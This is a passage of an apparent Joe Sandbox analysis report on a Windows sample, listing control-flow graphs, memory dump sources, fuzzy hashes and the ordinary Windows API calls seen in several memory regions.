• Opcode Fuzzy Hash: 3df1adb7ed4b542b722bd63a75713ff92911f56a6267a86b10970629f0605c09
• Instruction Fuzzy Hash: 312278B0B002098FDB65EBB9C9547AEB7F6AFC8300F248179D409AB395DB349D46CB51

Control-flow Graph
APIs
Memory Dump Source
• Source File: 00000000.00000002.1362257457.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c040000_NEW.jbxd
Similarity
• API ID: ActiveCaptureWindow
• String ID:
• API String ID: 2424615356-0
• Opcode ID: 198173c3746576d379d855e4073d85e1ad0c503517b5589202abf3add49feffe
• Instruction ID: 99fccb64d740575970cd91e4e2212ef8afcae6333171b7f1abaa44bee3027d0a
• Opcode Fuzzy Hash: 198173c3746576d379d855e4073d85e1ad0c503517b5589202abf3add49feffe
• Instruction Fuzzy Hash: B5E1EB75E00209CFDB25DFB5C584ADEBBF6BF89300F244269E405AB2A1DB719985DF10

Control-flow Graph
Memory Dump Source
• Source File: 00000000.00000002.1342658836.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_79d0000_NEW.jbxd
Similarity
• API ID: DispatchMessage
• String ID:
• API String ID: 2061451462-0
• Opcode ID: fe824b5dd9efbc33f3f58cbd441431ad89ff1ac2223656ad43e33f61a4992fc7
• Instruction ID: eb21199b72ecda74027496e4227d6768708e89ffa4608370886af329cb952e61
• Opcode Fuzzy Hash: fe824b5dd9efbc33f3f58cbd441431ad89ff1ac2223656ad43e33f61a4992fc7
• Instruction Fuzzy Hash: 50F169B0A00209DFDB24DFA9C844B9DBBF1BF88318F15C569E405AB2A5DB70AD45CB90

Control-flow Graph
Strings
Memory Dump Source
• Source File: 00000000.00000002.1362257457.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c040000_NEW.jbxd
Similarity
• API ID:
• String ID:
• API String ID: 0-3916222277
• Opcode ID: 1cac00a400ef0e08f7bae2caaf789653545cddc1d007f00c310edabc9a9a56be
• Instruction ID: 9d686c2d494daf83d42ba410396bbec2c20c916d2d5582945f8975e32cbe56a6
• Opcode Fuzzy Hash: 1cac00a400ef0e08f7bae2caaf789653545cddc1d007f00c310edabc9a9a56be
• Instruction Fuzzy Hash: D2022D75E00219CFDB24EB64CC54BDEB7B6BF99300F1086AAD50967290EF706A89CF51
Memory Dump Source
• Source File: 00000000.00000002.1352127589.0000000007CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ce0000_NEW.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e62a953e400e7f0c031be1fc13ebcb28b379c270dbeb647e1d3b76d27bb91f37
• Instruction ID: a71b067143df70f26ea8db7b7e224bf8abb1eeb42cdc83ef6b5c737782f0e9cc
• Opcode Fuzzy Hash: e62a953e400e7f0c031be1fc13ebcb28b379c270dbeb647e1d3b76d27bb91f37
• Instruction Fuzzy Hash: BE426370E006198FDB64DFA9C89079EBBFABFC8300F148569D40AAB355DB349D85CB91
Memory Dump Source
• Source File: 00000000.00000002.1362257457.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c040000_NEW.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 665bf6cdbdc4dd0206b945ee59a0a7e3f00a6a37a1add46ae25626559e04b428
• Instruction ID: e2ba491de434e6f06bf8d027a274dcc63a7f339103bcd90eb56e4a8f21f5ae48
• Opcode Fuzzy Hash: 665bf6cdbdc4dd0206b945ee59a0a7e3f00a6a37a1add46ae25626559e04b428
• Instruction Fuzzy Hash: 71320BB0B002198FDB68EB25C8547EE77F6BF88700F1481A9D5099B395DF349D828FA5
Memory Dump Source
• Source File: 00000000.00000002.1342658836.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_79d0000_NEW.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ac82a7b60bf0271d90a650c86847afa91eef8404c433a6c4cb08353d10d4d007
• Instruction ID: 55c445bd82c7cc81dc8f855e655dd974f952e5c3300ecf6dd4862dc5f897b2d4
• Opcode Fuzzy Hash: ac82a7b60bf0271d90a650c86847afa91eef8404c433a6c4cb08353d10d4d007
• Instruction Fuzzy Hash: BB423A75A1061ACFCB21DF64C845AE9B7B2FF89304F14C599E419AB261EB71EE81CF40
Memory Dump Source
• Source File: 00000000.00000002.1362257457.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c040000_NEW.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 22da33c73d6830f8d761efc2f269e8a36ae827bf83b4178725268106b49e1517
• Instruction ID: da8c7a7a0f82ab37b4326c1af2f5c6b33c06860f7a9bd49ea851ec32b112c5cb
• Opcode Fuzzy Hash: 22da33c73d6830f8d761efc2f269e8a36ae827bf83b4178725268106b49e1517
• Instruction Fuzzy Hash: 4342E774A00219CFCB18DB28C995AD9B7F1FF89701F1541F9D909AB3A1DA31AD81CF61
Memory Dump Source
• Source File: 00000000.00000002.1363943004.000000000CCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0CCD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ccd0000_NEW.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5d2c78326ab982cd733dff4dccd05a2d392cb121612dc2367c08020066fc8468
• Instruction ID: 77403afe85e1f532e36a4d9e9d6c7856eef06570d3cdf93ab9b9629ca0162fd3
• Opcode Fuzzy Hash: 5d2c78326ab982cd733dff4dccd05a2d392cb121612dc2367c08020066fc8468
• Instruction Fuzzy Hash: 7E323731A10619CFCB21DF65C944BD9B7B2FF89304F1586E9E509AB260EB71AE85CF40
Memory Dump Source
• Source File: 00000000.00000002.1363943004.000000000CCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0CCD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ccd0000_NEW.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f8e4d4209ca076c374c7fa92eaeffc8878e8c8b3c156f5f900fe57cf8d3d2091
• Instruction ID: 651bb9492d9d7700ee62439bfe8562958c68ea32acc0a68872590ddd8d4f94c7
• Opcode Fuzzy Hash: f8e4d4209ca076c374c7fa92eaeffc8878e8c8b3c156f5f900fe57cf8d3d2091
• Instruction Fuzzy Hash: 1BE18E717017058FDB29DB75C4507AEB7E6AFC9640F2548ADD24A8B2D0CF34E902CBA1
Memory Dump Source
• Source File: 00000000.00000002.1352127589.0000000007CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ce0000_NEW.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6550cd2589ac59e91b26ed8e36761318db05fe3b186e95a5d89afcc034ce8fd4
• Instruction ID: f661eddffd755bc1b426a9526221358980eee587c356040d9f0bb6bd0e2e2aa4
• Opcode Fuzzy Hash: 6550cd2589ac59e91b26ed8e36761318db05fe3b186e95a5d89afcc034ce8fd4
• Instruction Fuzzy Hash: C2C15EB1E006598FDB24CF69C88079EBBBAFF88310F14C165D849AB255DB70D985CF91
Memory Dump Source
• Source File: 00000000.00000002.1317389286.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_58b0000_NEW.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9f0675fb91256a220ec9e2535e5afbe62aca69df59eed04d13eaec414581e601
• Instruction ID: 3c0b5fd994dff28cec92d466ba2113b2f0048167932e05fd2cabc5b195c0e43c
• Opcode Fuzzy Hash: 9f0675fb91256a220ec9e2535e5afbe62aca69df59eed04d13eaec414581e601
• Instruction Fuzzy Hash: 87A19D70B007059FDB25EF79C49496ABBE6FF89310B148A69D80ACB355DB70ED01CB91

Control-flow Graph
APIs
• GetCurrentProcess.KERNEL32 ref: 01B0D1D6
• GetCurrentThread.KERNEL32 ref: 01B0D213
• GetCurrentProcess.KERNEL32 ref: 01B0D250
• GetCurrentThreadId.KERNEL32 ref: 01B0D2A9
Memory Dump Source
• Source File: 00000000.00000002.1304129332.0000000001B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1b00000_NEW.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: 62e0d7a2df6c4338529a7285916f1bcf8cf2fbce86c7f47f7abc859034973eea
• Instruction ID: 0537804ec4f47848219c6db8308e9511f77aee3f9162f36e64724c3c0ff941a9
• Opcode Fuzzy Hash: 62e0d7a2df6c4338529a7285916f1bcf8cf2fbce86c7f47f7abc859034973eea
• Instruction Fuzzy Hash: 385167B19003098FDB19DFA9D548B9EBFF1EF48314F248059E019A7390D7349944CB66

Control-flow Graph
APIs
• GetCurrentProcess.KERNEL32 ref: 01B0D1D6
• GetCurrentThread.KERNEL32 ref: 01B0D213
• GetCurrentProcess.KERNEL32 ref: 01B0D250
• GetCurrentThreadId.KERNEL32 ref: 01B0D2A9
Memory Dump Source
• Source File: 00000000.00000002.1304129332.0000000001B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1b00000_NEW.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: b8a83cbeab428591768d84616bfdb15f3a07d8fea017e7c03e0875341c0dad29
• Instruction ID: c137f679acd4c58e219ff79691f28ff2131f79155d580dbabeac44b811326375
• Opcode Fuzzy Hash: b8a83cbeab428591768d84616bfdb15f3a07d8fea017e7c03e0875341c0dad29
• Instruction Fuzzy Hash: E55135B1D003098FEB19DFAAD948B9EBBF1FF48314F248459E419A7390DB349984CB65
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1317389286.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 059d38e30137b55ef7034058d103464417fca4dc18e02eab55b1213703bab1cd
                                                                                    • Instruction ID: 54602cc5caaa23553f73c6b74940733bb4d17092da0363de10f5a20a9f844328
                                                                                    • Opcode Fuzzy Hash: 059d38e30137b55ef7034058d103464417fca4dc18e02eab55b1213703bab1cd
                                                                                    • Instruction Fuzzy Hash: F0224B74E042098BEF24DB58C589AFEB7BBBB88314F248555DC11E7365CBB49C41CB52

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 1199 755d008-755d09d 1201 755d0d6-755d0f6 1199->1201 1202 755d09f-755d0a9 1199->1202 1207 755d12f-755d15e 1201->1207 1208 755d0f8-755d102 1201->1208 1202->1201 1203 755d0ab-755d0ad 1202->1203 1205 755d0d0-755d0d3 1203->1205 1206 755d0af-755d0b9 1203->1206 1205->1201 1209 755d0bd-755d0cc 1206->1209 1210 755d0bb 1206->1210 1218 755d197-755d251 CreateProcessA 1207->1218 1219 755d160-755d16a 1207->1219 1208->1207 1211 755d104-755d106 1208->1211 1209->1209 1212 755d0ce 1209->1212 1210->1209 1213 755d129-755d12c 1211->1213 1214 755d108-755d112 1211->1214 1212->1205 1213->1207 1216 755d114 1214->1216 1217 755d116-755d125 1214->1217 1216->1217 1217->1217 1220 755d127 1217->1220 1230 755d253-755d259 1218->1230 1231 755d25a-755d2e0 1218->1231 1219->1218 1221 755d16c-755d16e 1219->1221 1220->1213 1223 755d191-755d194 1221->1223 1224 755d170-755d17a 1221->1224 1223->1218 1225 755d17c 1224->1225 1226 755d17e-755d18d 1224->1226 1225->1226 1226->1226 1227 755d18f 1226->1227 1227->1223 1230->1231 1241 755d2f0-755d2f4 1231->1241 1242 755d2e2-755d2e6 1231->1242 1243 755d304-755d308 1241->1243 1244 755d2f6-755d2fa 1241->1244 1242->1241 1245 755d2e8 1242->1245 1247 755d318-755d31c 1243->1247 1248 755d30a-755d30e 1243->1248 1244->1243 1246 755d2fc 1244->1246 1245->1241 1246->1243 1250 755d32e-755d335 1247->1250 1251 755d31e-755d324 1247->1251 1248->1247 1249 755d310 1248->1249 1249->1247 1252 755d337-755d346 1250->1252 1253 755d34c 1250->1253 1251->1250 1252->1253
                                                                                    APIs
                                                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0755D23E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1340072733.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7550000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateProcess
                                                                                    • String ID:
                                                                                    • API String ID: 963392458-0
                                                                                    • Opcode ID: 6afaffc3a52ae4f8070e06c54f8d90a2ed15cf409280901f9169b16b28210aaa
                                                                                    • Instruction ID: f419e21a488b99917b4a9386c89f8446ad4af72af3f0a1ca4e97a877af4d6dff
                                                                                    • Opcode Fuzzy Hash: 6afaffc3a52ae4f8070e06c54f8d90a2ed15cf409280901f9169b16b28210aaa
                                                                                    • Instruction Fuzzy Hash: 37914DB1E0031ADFEB24CFA9C891BDEBBB2BF44314F14816AD808A7250D7759985CF91

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 1255 79d1bc8-79d1c2c 1258 79d1eba-79d1f11 1255->1258 1259 79d1c32-79d1c4a 1255->1259 1282 79d1ead-79d1eb7 1258->1282 1283 79d1f13-79d1f43 1258->1283 1265 79d1c4c-79d1c52 1259->1265 1266 79d1c62-79d1c64 1259->1266 1268 79d1c54 1265->1268 1269 79d1c56-79d1c58 1265->1269 1270 79d1c74-79d1cd5 GetCurrentThreadId 1266->1270 1271 79d1c66-79d1c6d 1266->1271 1268->1266 1269->1266 1280 79d1cde-79d1ce7 1270->1280 1281 79d1cd7-79d1cdd 1270->1281 1271->1270 1285 79d1ce9-79d1cef 1280->1285 1286 79d1cf8-79d1cfe 1280->1286 1281->1280 1296 79d1f45-79d1f5c 1283->1296 1297 79d1f64-79d1f6a 1283->1297 1285->1286 1288 79d1cf1 1285->1288 1289 79d1d07-79d1d24 1286->1289 1290 79d1d00-79d1d05 1286->1290 1288->1286 1295 79d1d2d-79d1d4d 1289->1295 1290->1289 1300 79d1d6d-79d1d88 1295->1300 1301 79d1d4f-79d1d65 1295->1301 1296->1297 1304 79d1d8a 1300->1304 1305 79d1d92-79d1d93 1300->1305 1301->1300 1304->1305 1305->1282
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 079D1CC1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1342658836.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_79d0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentThread
                                                                                    • String ID:
                                                                                    • API String ID: 2882836952-0
                                                                                    • Opcode ID: 955fcf6703137ddcb136271d01e45e0fc38211706b60687dd3c4dec5fd15d2f2
                                                                                    • Instruction ID: 1cc008cd0ef4abd68a6e2943242dddef4296b6a257f58dc460d6ad7c03ac2792
                                                                                    • Opcode Fuzzy Hash: 955fcf6703137ddcb136271d01e45e0fc38211706b60687dd3c4dec5fd15d2f2
                                                                                    • Instruction Fuzzy Hash: FA71BDB1E003098FDB25DFA9D854AEDBBF6BF88314F14852AD415AB350DB709D06CBA1

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 1309 1b0aed0-1b0aedf 1310 1b0aee1-1b0aeee call 1b098d8 1309->1310 1311 1b0af0b-1b0af0f 1309->1311 1316 1b0aef0 1310->1316 1317 1b0af04 1310->1317 1313 1b0af11-1b0af1b 1311->1313 1314 1b0af23-1b0af64 1311->1314 1313->1314 1320 1b0af71-1b0af7f 1314->1320 1321 1b0af66-1b0af6e 1314->1321 1365 1b0aef6 call 1b0b168 1316->1365 1366 1b0aef6 call 1b0b159 1316->1366 1317->1311 1322 1b0af81-1b0af86 1320->1322 1323 1b0afa3-1b0afa5 1320->1323 1321->1320 1325 1b0af91 1322->1325 1326 1b0af88-1b0af8f call 1b0a8b4 1322->1326 1328 1b0afa8-1b0afaf 1323->1328 1324 1b0aefc-1b0aefe 1324->1317 1327 1b0b040-1b0b100 1324->1327 1332 1b0af93-1b0afa1 1325->1332 1326->1332 1360 1b0b102-1b0b105 1327->1360 1361 1b0b108-1b0b133 GetModuleHandleW 1327->1361 1330 1b0afb1-1b0afb9 1328->1330 1331 1b0afbc-1b0afc3 1328->1331 1330->1331 1335 1b0afd0-1b0afd9 call 1b0a8c4 1331->1335 1336 1b0afc5-1b0afcd 1331->1336 1332->1328 1340 1b0afe6-1b0afeb 1335->1340 1341 1b0afdb-1b0afe3 1335->1341 1336->1335 1342 1b0b009-1b0b016 1340->1342 1343 1b0afed-1b0aff4 1340->1343 1341->1340 1350 1b0b018-1b0b036 1342->1350 1351 1b0b039-1b0b03f 1342->1351 1343->1342 1345 1b0aff6-1b0b006 call 1b0a8d4 call 1b0a8e4 1343->1345 1345->1342 1350->1351 1360->1361 1362 1b0b135-1b0b13b 1361->1362 1363 1b0b13c-1b0b150 1361->1363 1362->1363 1365->1324 1366->1324
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 01B0B126
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1304129332.0000000001B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1b00000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0
                                                                                    • Opcode ID: 52f5a91696d62489afa7dc8cc51dc71c2b5b402945205b5fb8084df10aca61d5
                                                                                    • Instruction ID: 03aec1be83046b4ddf1ce24ef4c6ebe316b8d2a95f6b39100d91e767604dd33d
                                                                                    • Opcode Fuzzy Hash: 52f5a91696d62489afa7dc8cc51dc71c2b5b402945205b5fb8084df10aca61d5
                                                                                    • Instruction Fuzzy Hash: 4B7145B0A00B058FEB2ADF29D55475ABBF5FF88300F008A6DD486DBA80D775E945CB91

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 1367 58bbdc0-58bbe19 1370 58bbe1b-58bbe28 1367->1370 1371 58bbe2f-58bbe35 1367->1371 1370->1371 1372 58bbe37-58bbe3d 1371->1372 1373 58bbe56-58bbe9c 1371->1373 1372->1373 1375 58bbe3f-58bbe48 1372->1375 1384 58bbe9e-58bbea8 call 58bb198 1373->1384 1385 58bbec5-58bbecf 1373->1385 1375->1373 1377 58bbe4a-58bbe50 1375->1377 1377->1373 1378 58bbf4b-58bbf5e 1377->1378 1380 58bbf60-58bbf78 call 58b761c 1378->1380 1392 58bbf7a-58bbfc2 1380->1392 1393 58bbfc9 1380->1393 1389 58bbead-58bbec0 1384->1389 1385->1378 1387 58bbed1-58bbede 1385->1387 1390 58bbeec-58bbef5 1387->1390 1391 58bbee0-58bbee6 1387->1391 1389->1380 1395 58bbf03-58bbf46 call 58b45a0 KiUserCallbackDispatcher 1390->1395 1396 58bbef7-58bbefd 1390->1396 1391->1390 1394 58bbee8 1391->1394 1392->1393 1394->1390 1395->1378 1396->1395 1397 58bbeff 1396->1397 1397->1395
                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(00000014,?,?,0435412C,033708D8,?,00000000), ref: 058BBF46
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1317389286.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    • Opcode ID: a1d0d5c13f992a6d9d19677484699e9957c21dc8bd6d0287dd37a662710ef8a8
                                                                                    • Instruction ID: 534a52b55ac9dc350684d6bd20a4e553e880586d5f8bb26ad84d59ce8e916818
                                                                                    • Opcode Fuzzy Hash: a1d0d5c13f992a6d9d19677484699e9957c21dc8bd6d0287dd37a662710ef8a8
                                                                                    • Instruction Fuzzy Hash: FF71AE74A01209AFDB15DFA8D898DAEBBB6BF48711F114099F901AB361DB71EC81CF50

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 1544 79d2100-79d2105 1545 79d2107-79d2109 1544->1545 1546 79d20a1 1544->1546 1547 79d210b-79d214a call 79d02f4 1545->1547 1548 79d20a5-79d20ab 1545->1548 1546->1548 1558 79d214c-79d214e call 79d0304 1547->1558 1559 79d2153-79d2157 call 7ce17eb 1547->1559 1550 79d20ad-79d20b0 1548->1550 1551 79d20b5-79d20d2 PostMessageW 1548->1551 1550->1551 1552 79d20db-79d20fc 1551->1552 1553 79d20d4-79d20da 1551->1553 1553->1552 1558->1559 1561 79d215c-79d216a 1559->1561 1563 79d216c-79d2175 1561->1563 1564 79d2198 1561->1564 1563->1564 1569 79d2177-79d2180 1563->1569 1565 79d219a-79d21a0 1564->1565 1567 79d229e-79d22a5 1565->1567 1568 79d21a6-79d21d1 call 79d0320 1565->1568 1579 79d21d6-79d21fb call 79d0330 1568->1579 1580 79d21d3 1568->1580 1569->1564 1572 79d2182-79d2196 call 79d0314 1569->1572 1572->1565 1585 79d21fd 1579->1585 1586 79d2200-79d2223 1579->1586 1580->1579 1585->1586 1589 79d222a-79d2243 call 79d0340 call 79d034c 1586->1589 1589->1567 1594 79d2245-79d2254 1589->1594 1597 79d2255 1594->1597 1598 79d221b-79d2223 1597->1598 1599 79d2257-79d22b9 1597->1599 1598->1589 1599->1597 1606 79d22bb-79d22eb 1599->1606 1609 79d2381-79d2394 1606->1609 1610 79d22f1 1606->1610 1624 79d239f-79d23a3 1609->1624 1625 79d2396-79d2398 1609->1625 1611 79d230d-79d2317 call 79d035c 1610->1611 1612 79d234d-79d2354 1610->1612 1613 79d22f8-79d230b 1610->1613 1614 79d2338-79d234b 1610->1614 1615 79d2320-79d2336 1610->1615 1611->1609 1627 79d2319 1611->1627 1616 79d236e-79d237a 1612->1616 1617 79d2356-79d236c 1612->1617 1613->1609 1614->1609 1615->1609 1616->1609 1617->1609 1625->1624 1627->1612 1627->1614 1627->1615
                                                                                    APIs
                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 079D20C5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1342658836.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_79d0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost
                                                                                    • String ID:
                                                                                    • API String ID: 410705778-0
                                                                                    • Opcode ID: 528f9451ee09f8105f1f9470cac43ed488d0d7d8f801071f3144367cee724cbf
                                                                                    • Instruction ID: 8fbeaf3c29f0c4dcc2dd01fbe083a649a99ef423dfab6e60b94e15ff963af29f
                                                                                    • Opcode Fuzzy Hash: 528f9451ee09f8105f1f9470cac43ed488d0d7d8f801071f3144367cee724cbf
                                                                                    • Instruction Fuzzy Hash: 5A51D2B1A002068FDF15EBB8D8547EEBBB6AFC8304F148429D501A7291EF749D46CB61
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 079D1CC1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1342658836.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_79d0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentThread
                                                                                    • String ID:
                                                                                    • API String ID: 2882836952-0
                                                                                    • Opcode ID: d22e9c09009330fd0a7a5bf1aab95440901d497cb6e4893e144295210787a26e
                                                                                    • Instruction ID: 39286328191a0e69d2e26ec35507ad4d5ccebc7c83a6a945bd8472ee8a5771eb
                                                                                    • Opcode Fuzzy Hash: d22e9c09009330fd0a7a5bf1aab95440901d497cb6e4893e144295210787a26e
                                                                                    • Instruction Fuzzy Hash: 5161BCB2E0035D8FDF25DFA5C854AEDBBF6AF48304F15815AD811AB290DB749C01CBA1
                                                                                    APIs
                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 058B1E02
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1317389286.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateWindow
                                                                                    • String ID:
                                                                                    • API String ID: 716092398-0
                                                                                    • Opcode ID: 6f811e0d9de187d837198f0d2abbaefdca079cd16d70b92b7cfc8f822d038aa9
                                                                                    • Instruction ID: 3871531bdbd64335bcd47deddc083d409db7e424bf8d87313681fb24d84cc5e4
                                                                                    • Opcode Fuzzy Hash: 6f811e0d9de187d837198f0d2abbaefdca079cd16d70b92b7cfc8f822d038aa9
                                                                                    • Instruction Fuzzy Hash: 9751B1B1D10349DFDB14CFA9C894ADEBBB5BF48310F24812AE819AB210D775A945CF91
                                                                                    APIs
                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 079D20C5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1342658836.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_79d0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost
                                                                                    • String ID:
                                                                                    • API String ID: 410705778-0
                                                                                    • Opcode ID: 1b5888ae1e0b9cbec3352ce01f45c2eb5d0d6a3d0a785c57bd0719f76c1a66ce
                                                                                    • Instruction ID: 52463a912f45d78d63d98433770c0cd7d23eed520212dbc7d0325d24afc3f8be
                                                                                    • Opcode Fuzzy Hash: 1b5888ae1e0b9cbec3352ce01f45c2eb5d0d6a3d0a785c57bd0719f76c1a66ce
                                                                                    • Instruction Fuzzy Hash: 724101B6904386CFDB20CFA9C540ADAFBF4EF49314F04895EE58997661C330A845CFA5
                                                                                    APIs
                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 058B1E02
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1317389286.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateWindow
                                                                                    • String ID:
                                                                                    • API String ID: 716092398-0
                                                                                    • Opcode ID: 579b6c8ba52e0c0695e2b3a5f5d710a1d5dd24fefdf2d5fd92a79c52f18c2f87
                                                                                    • Instruction ID: 875c767837c1a763e89ecb1929c297bf69e2060d502be0a00151e54f6d2bfea0
                                                                                    • Opcode Fuzzy Hash: 579b6c8ba52e0c0695e2b3a5f5d710a1d5dd24fefdf2d5fd92a79c52f18c2f87
                                                                                    • Instruction Fuzzy Hash: 8341A0B1D103499FDB14CF9AC894ADEBBB5BF48314F24812AE819AB210D775A945CF90
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1362257457.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c040000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: Focus
                                                                                    • String ID:
                                                                                    • API String ID: 2734777837-0
                                                                                    • Opcode ID: a4af8296664e60d690848ef7c4f1e9dae536db99c71139b4a8c8feb95f2aa955
                                                                                    • Instruction ID: 76834f8c740fb9c210d39472804f7619361726f1d344f1e73d0769e415a7d628
                                                                                    • Opcode Fuzzy Hash: a4af8296664e60d690848ef7c4f1e9dae536db99c71139b4a8c8feb95f2aa955
                                                                                    • Instruction Fuzzy Hash: 063170B4A012268FCB149FA9C444BAFBBF4BF48710F2444A9E815AB350CB35E801CBA1
                                                                                    APIs
                                                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 058B4381
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1317389286.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
